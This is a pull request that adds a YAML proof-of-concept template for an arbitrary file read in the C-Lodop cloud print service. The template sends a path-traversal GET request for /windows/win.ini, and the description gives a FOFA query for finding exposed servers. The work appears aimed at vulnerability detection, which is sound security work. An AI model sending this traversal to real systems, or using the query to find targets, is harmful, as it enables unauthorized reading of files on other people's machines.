### PR TITLE
C-Lodop云打印服务系统任意文件读取漏洞

### DIFF
--- a/pocs/c-lodop-file-read.yml
+++ b/pocs/c-lodop-file-read.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-c-lodop-file-read
+transport: http
+rules:
+    r1:
+        request:
+            method: GET
+            path: "/../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini"
+        expression: |
+            response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+expression:
+    r1()
+detail:
+    author: 凉风(https://github.com/c0olw)
+    links:
+        - https://blog.csdn.net/Trouble_99/article/details/118187603


### PR DESCRIPTION

----------

## 本 poc 是检测什么漏洞的
C-Lodop云打印服务系统任意文件读取漏洞

## 测试环境
FOFA 语法：body="欢迎使用C-Lodop打印服务系统"

## 备注
内网很常见，公网也有很多。
![image](https://user-images.githubusercontent.com/32671990/147367501-e2e5de73-2a92-445c-9c65-68dfe66e74cf.png)

![image](https://user-images.githubusercontent.com/32671990/147367462-9c611714-876d-4c78-a97f-a2e5178aaa88.png)

![image](https://user-images.githubusercontent.com/32671990/147367430-1919f133-1790-4e4f-9e7b-041d20d3f194.png)

![image](https://user-images.githubusercontent.com/32671990/147367535-e0c32d93-1de2-4a08-92f8-b45449f3df4d.png)

